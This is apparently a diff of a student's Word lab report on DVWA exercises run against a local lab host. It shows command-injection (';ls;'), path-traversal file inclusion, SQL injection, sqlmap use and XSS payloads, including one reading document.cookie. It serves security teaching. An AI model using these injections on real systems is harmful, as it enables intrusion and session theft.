+<w:endnotes xmlns:wpc="http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas" xmlns:cx="http://schemas.microsoft.com/office/drawing/2014/chartex" xmlns:cx1="http://schemas.microsoft.com/office/drawing/2015/9/8/chartex" xmlns:cx2="http://schemas.microsoft.com/office/drawing/2015/10/21/chartex" xmlns:cx3="http://schemas.microsoft.com/office/drawing/2016/5/9/chartex" xmlns:cx4="http://schemas.microsoft.com/office/drawing/2016/5/10/chartex" xmlns:cx5="http://schemas.microsoft.com/office/drawing/2016/5/11/chartex" xmlns:cx6="http://schemas.microsoft.com/office/drawing/2016/5/12/chartex" xmlns:cx7="http://schemas.microsoft.com/office/drawing/2016/5/13/chartex" xmlns:cx8="http://schemas.microsoft.com/office/drawing/2016/5/14/chartex" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:aink="http://schemas.microsoft.com/office/drawing/2016/ink" xmlns:am3d="http://schemas.microsoft.com/office/drawing/2017/model3d" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" xmlns:w16cid="http://schemas.microsoft.com/office/word/2016/wordml/cid" xmlns:w16se="http://schemas.microsoft.com/office/word/2015/wordml/symex" xmlns:wpg="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup" xmlns:wpi="http://schemas.microsoft.com/office/word/2010/wordprocessingInk" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml" xmlns:wps="http://schemas.microsoft.com/office/word/2010/wordprocessingShape" mc:Ignorable="w14 w15 w16se w16cid wp14">
+  <w:endnote w:type="separator" w:id="-1">
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+      </w:pPr>
+      <w:r>
+        <w:separator/>
+      </w:r>
+    </w:p>
+  </w:endnote>
+  <w:endnote w:type="continuationSeparator" w:id="0">
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+      </w:pPr>
+      <w:r>
+        <w:continuationSeparator/>
+      </w:r>
+    </w:p>
+  </w:endnote>
+</w:endnotes>
+</file>
+
+<file path=word/footnotes.xml><?xml version="1.0" encoding="utf-8"?>
+<w:footnotes xmlns:wpc="http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas" xmlns:cx="http://schemas.microsoft.com/office/drawing/2014/chartex" xmlns:cx1="http://schemas.microsoft.com/office/drawing/2015/9/8/chartex" xmlns:cx2="http://schemas.microsoft.com/office/drawing/2015/10/21/chartex" xmlns:cx3="http://schemas.microsoft.com/office/drawing/2016/5/9/chartex" xmlns:cx4="http://schemas.microsoft.com/office/drawing/2016/5/10/chartex" xmlns:cx5="http://schemas.microsoft.com/office/drawing/2016/5/11/chartex" xmlns:cx6="http://schemas.microsoft.com/office/drawing/2016/5/12/chartex" xmlns:cx7="http://schemas.microsoft.com/office/drawing/2016/5/13/chartex" xmlns:cx8="http://schemas.microsoft.com/office/drawing/2016/5/14/chartex" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:aink="http://schemas.microsoft.com/office/drawing/2016/ink" xmlns:am3d="http://schemas.microsoft.com/office/drawing/2017/model3d" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" xmlns:w16cid="http://schemas.microsoft.com/office/word/2016/wordml/cid" xmlns:w16se="http://schemas.microsoft.com/office/word/2015/wordml/symex" xmlns:wpg="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup" xmlns:wpi="http://schemas.microsoft.com/office/word/2010/wordprocessingInk" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml" xmlns:wps="http://schemas.microsoft.com/office/word/2010/wordprocessingShape" mc:Ignorable="w14 w15 w16se w16cid wp14">
+  <w:footnote w:type="separator" w:id="-1">
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+      </w:pPr>
+      <w:r>
+        <w:separator/>
+      </w:r>
+    </w:p>
+  </w:footnote>
+  <w:footnote w:type="continuationSeparator" w:id="0">
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+      </w:pPr>
+      <w:r>
+        <w:continuationSeparator/>
+      </w:r>
+    </w:p>
+  </w:footnote>
+</w:footnotes>
 </file>
 
 <file path=word/numbering.xml><?xml version="1.0" encoding="utf-8"?>
@@ -686,6 +977,25 @@
     <w:name w:val="Normal"/>
     <w:qFormat/>
   </w:style>
+  <w:style w:type="paragraph" w:styleId="Heading3">
+    <w:name w:val="heading 3"/>
+    <w:basedOn w:val="Normal"/>
+    <w:link w:val="Heading3Char"/>
+    <w:uiPriority w:val="9"/>
+    <w:qFormat/>
+    <w:rsid w:val="00965424"/>
+    <w:pPr>
+      <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
+      <w:outlineLvl w:val="2"/>
+    </w:pPr>
+    <w:rPr>
+      <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+      <w:b/>
+      <w:bCs/>
+      <w:sz w:val="27"/>
+      <w:szCs w:val="27"/>
+    </w:rPr>
+  </w:style>
   <w:style w:type="character" w:default="1" w:styleId="DefaultParagraphFont">
     <w:name w:val="Default Paragraph Font"/>
     <w:uiPriority w:val="1"/>
@@ -793,6 +1103,64 @@
     <w:rPr>
       <w:color w:val="808080"/>
       <w:shd w:val="clear" w:color="auto" w:fill="E6E6E6"/>
+    </w:rPr>
+  </w:style>
+  <w:style w:type="paragraph" w:styleId="Header">
+    <w:name w:val="header"/>
+    <w:basedOn w:val="Normal"/>
+    <w:link w:val="HeaderChar"/>
+    <w:uiPriority w:val="99"/>
+    <w:unhideWhenUsed/>
+    <w:rsid w:val="00AF0C75"/>
+    <w:pPr>
+      <w:tabs>
+        <w:tab w:val="center" w:pos="4680"/>
+        <w:tab w:val="right" w:pos="9360"/>
+      </w:tabs>
+      <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+    </w:pPr>
+  </w:style>
+  <w:style w:type="character" w:customStyle="1" w:styleId="HeaderChar">
+    <w:name w:val="Header Char"/>
+    <w:basedOn w:val="DefaultParagraphFont"/>
+    <w:link w:val="Header"/>
+    <w:uiPriority w:val="99"/>
+    <w:rsid w:val="00AF0C75"/>
+  </w:style>
+  <w:style w:type="paragraph" w:styleId="Footer">
+    <w:name w:val="footer"/>
+    <w:basedOn w:val="Normal"/>
+    <w:link w:val="FooterChar"/>
+    <w:uiPriority w:val="99"/>
+    <w:unhideWhenUsed/>
+    <w:rsid w:val="00AF0C75"/>
+    <w:pPr>
+      <w:tabs>
+        <w:tab w:val="center" w:pos="4680"/>
+        <w:tab w:val="right" w:pos="9360"/>
+      </w:tabs>
+      <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+    </w:pPr>
+  </w:style>
+  <w:style w:type="character" w:customStyle="1" w:styleId="FooterChar">
+    <w:name w:val="Footer Char"/>
+    <w:basedOn w:val="DefaultParagraphFont"/>
+    <w:link w:val="Footer"/>
+    <w:uiPriority w:val="99"/>
+    <w:rsid w:val="00AF0C75"/>
+  </w:style>
+  <w:style w:type="character" w:customStyle="1" w:styleId="Heading3Char">
+    <w:name w:val="Heading 3 Char"/>
+    <w:basedOn w:val="DefaultParagraphFont"/>
+    <w:link w:val="Heading3"/>
+    <w:uiPriority w:val="9"/>
+    <w:rsid w:val="00965424"/>
+    <w:rPr>
+      <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+      <w:b/>
+      <w:bCs/>
+      <w:sz w:val="27"/>
+      <w:szCs w:val="27"/>
     </w:rPr>
   </w:style>
 </w:styles>

--- a/Assignment6/Assignment 6 report.docx
+++ b/Assignment6/Assignment 6 report.docx
@@ -2,6 +2,21 @@
 <file path=word/document.xml><?xml version="1.0" encoding="utf-8"?>
 <w:document xmlns:wpc="http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas" xmlns:cx="http://schemas.microsoft.com/office/drawing/2014/chartex" xmlns:cx1="http://schemas.microsoft.com/office/drawing/2015/9/8/chartex" xmlns:cx2="http://schemas.microsoft.com/office/drawing/2015/10/21/chartex" xmlns:cx3="http://schemas.microsoft.com/office/drawing/2016/5/9/chartex" xmlns:cx4="http://schemas.microsoft.com/office/drawing/2016/5/10/chartex" xmlns:cx5="http://schemas.microsoft.com/office/drawing/2016/5/11/chartex" xmlns:cx6="http://schemas.microsoft.com/office/drawing/2016/5/12/chartex" xmlns:cx7="http://schemas.microsoft.com/office/drawing/2016/5/13/chartex" xmlns:cx8="http://schemas.microsoft.com/office/drawing/2016/5/14/chartex" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:aink="http://schemas.microsoft.com/office/drawing/2016/ink" xmlns:am3d="http://schemas.microsoft.com/office/drawing/2017/model3d" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" xmlns:w16cid="http://schemas.microsoft.com/office/word/2016/wordml/cid" xmlns:w16se="http://schemas.microsoft.com/office/word/2015/wordml/symex" xmlns:wpg="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup" xmlns:wpi="http://schemas.microsoft.com/office/word/2010/wordprocessingInk" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml" xmlns:wps="http://schemas.microsoft.com/office/word/2010/wordprocessingShape" mc:Ignorable="w14 w15 w16se w16cid wp14">
   <w:body>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+        </w:rPr>
+        <w:t>Mark Thompson – C00202927 – Assignment 6</w:t>
+      </w:r>
+      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
+      <w:bookmarkEnd w:id="0"/>
+    </w:p>
     <w:p>
       <w:pPr>
         <w:rPr>
@@ -145,7 +160,19 @@
         <w:rPr>
           <w:b/>
         </w:rPr>
-        <w:t>;ls;  -- Get list of directory at this level</w:t>
+        <w:t xml:space="preserve">;ls;  -- Get list of </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+        </w:rPr>
+        <w:t>directories</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+        </w:rPr>
+        <w:t xml:space="preserve"> at this level</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -183,6 +210,81 @@
       </w:r>
     </w:p>
     <w:p>
+      <w:r>
+        <w:t>flag{command_injection_is_a_serious_vulnerability}</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">Used this exploit - </w:t>
+      </w:r>
+      <w:hyperlink r:id="rId7" w:history="1">
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Hyperlink"/>
+          </w:rPr>
+          <w:t>http://192.168.56.102/vulnerabilities/fi/?page=../../hackable/uploads/flag.txt</w:t>
+        </w:r>
+      </w:hyperlink>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:t>I used the exploit for task 2 to get list of directories. I used the hidden file attribute for ls command but I didn’t see any hidden files anywhere. So I grabbed the flag in the hackable/uploads directory.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="53E4315C" wp14:editId="3EC7D842">
+            <wp:extent cx="5943600" cy="3527425"/>
+            <wp:effectExtent l="0" t="0" r="0" b="0"/>
+            <wp:docPr id="7" name="Picture 7"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="1" name=""/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId8"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5943600" cy="3527425"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
       <w:pPr>
         <w:rPr>
           <w:b/>
@@ -205,6 +307,7 @@
         <w:rPr>
           <w:b/>
         </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:t>Task 5: SQL injection</w:t>
       </w:r>
     </w:p>
@@ -263,13 +366,7 @@
         <w:t xml:space="preserve">OR 'a'='a </w:t>
       </w:r>
       <w:r>
-        <w:t xml:space="preserve">to the input which causes the </w:t>
-      </w:r>
-      <w:r>
-        <w:t>where clause to always evaluate to true, so the query becomes logically equivalent to the much simpler query:</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
+        <w:t xml:space="preserve">to the input which causes the where clause to always evaluate to true, so the query becomes logically equivalent to the much simpler query: </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -316,7 +413,7 @@
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId7"/>
+                    <a:blip r:embed="rId9"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -353,70 +450,461 @@
           <w:b/>
           <w:bCs/>
         </w:rPr>
+        <w:t>Task 6: Blind SQLI</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:left="180"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+        </w:rPr>
+        <w:t xml:space="preserve">Why your payload from Task 5 does not work in this page? </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:left="180"/>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">Task 5 payload doesn’t work because the page’s </w:t>
+      </w:r>
+      <w:r>
+        <w:t>PHP</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> code is checking for the count of rows retrieved by the query. The Task 5 exploit returns more than 1 row, and it branches to the </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+        </w:rPr>
+        <w:t>“User ID exists in the database.”</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> message.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:left="180"/>
+        <w:rPr>
+          <w:b/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+        </w:rPr>
+        <w:t>Command line arguments passed to the sqlmap.py</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+        </w:rPr>
+        <w:t>Task 6: Weak Session ID</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:left="180"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
         <w:lastRenderedPageBreak/>
-        <w:t>Task 6: Blind SQLI</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:ind w:left="180"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-        </w:rPr>
-        <w:t xml:space="preserve">Why your payload from Task 5 does not work in this page? </w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:ind w:left="180"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">Task 5 payload doesn’t work because the page’s php code is checking for the count of rows retrieved by the query. The Task 5 exploit returns more than 1 row, and it branches to the </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:i/>
-        </w:rPr>
-        <w:t>“User ID exists in the database.”</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> message.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:ind w:left="180"/>
-        <w:rPr>
-          <w:b/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-        </w:rPr>
-        <w:t>Command line arguments passed to the sqlmap.py</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:ind w:left="180"/>
-      </w:pPr>
-      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
-      <w:bookmarkEnd w:id="0"/>
-    </w:p>
-    <w:p/>
-    <w:p>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-        </w:rPr>
-        <w:t>Task 6: Weak Session ID</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4CF2F692" wp14:editId="0039910D">
+            <wp:extent cx="5943600" cy="3866515"/>
+            <wp:effectExtent l="0" t="0" r="0" b="635"/>
+            <wp:docPr id="2" name="Picture 2"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="1" name=""/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId10"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5943600" cy="3866515"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:left="180"/>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7D47F0B6" wp14:editId="4BEA5FB1">
+            <wp:extent cx="5943600" cy="3494029"/>
+            <wp:effectExtent l="0" t="0" r="0" b="0"/>
+            <wp:docPr id="3" name="Picture 3"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="1" name=""/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId11"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5943600" cy="3494029"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:left="180"/>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:t xml:space="preserve">The dvwaSession id looks to be an integer that is incremented per request. It’s clearly visible in the two screenshots above. This may allow a hijacker to exploit. To fix this, </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:t>a hard-to-guess id should be used – a long and random string.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:noProof/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:noProof/>
+        </w:rPr>
+        <w:t>Task 7: DOM based XSS attack</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:left="180"/>
+        <w:rPr>
+          <w:b/>
+          <w:noProof/>
+        </w:rPr>
+      </w:pPr>
+      <w:hyperlink r:id="rId12" w:history="1">
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Hyperlink"/>
+            <w:noProof/>
+          </w:rPr>
+          <w:t>http://192.168.56.102/vulnerabilities/xss_d/?default=English&amp;%3Cscript%3Ealert(%22Mark%20Thompson%22)%3C/script%3E</w:t>
+        </w:r>
+      </w:hyperlink>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:left="180"/>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:t>To bypass the sanitized input, I found that adding the script block as an additional parameter bypassed the input checking.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:left="180"/>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="720BB675" wp14:editId="1C65127B">
+            <wp:extent cx="5814104" cy="3133155"/>
+            <wp:effectExtent l="0" t="0" r="0" b="0"/>
+            <wp:docPr id="4" name="Picture 4"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="1" name=""/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId13"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5830019" cy="3141732"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+        </w:rPr>
+        <w:t>Task 8: Reflected XSS</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:left="180"/>
+        <w:rPr>
+          <w:b/>
+        </w:rPr>
+      </w:pPr>
+      <w:hyperlink r:id="rId14" w:history="1">
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Hyperlink"/>
+          </w:rPr>
+          <w:t>http://192.168.56.102/vulnerabilities/xss_r/?name=1%3Cscript%3Ealert(document.cookie)%3C/script%3E</w:t>
+        </w:r>
+      </w:hyperlink>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:left="180"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0E084F26" wp14:editId="2F2AF536">
+            <wp:extent cx="5943600" cy="3625850"/>
+            <wp:effectExtent l="0" t="0" r="0" b="0"/>
+            <wp:docPr id="5" name="Picture 5"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="1" name=""/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId15"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5943600" cy="3625850"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:t>Task 9: Stored XSS</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:left="180"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">Exploit payload entered in Message Box - </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>&lt;script&gt;alert("XSS");&lt;/script&gt;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:left="180"/>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7F3547F6" wp14:editId="3A16A56C">
+            <wp:extent cx="5943600" cy="3589655"/>
+            <wp:effectExtent l="0" t="0" r="0" b="0"/>
+            <wp:docPr id="6" name="Picture 6"/>
+            <wp:cNvGraphicFramePr>
